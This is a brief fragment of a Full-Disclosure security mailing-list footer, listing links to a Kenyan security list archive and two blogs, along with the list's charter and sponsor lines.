{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
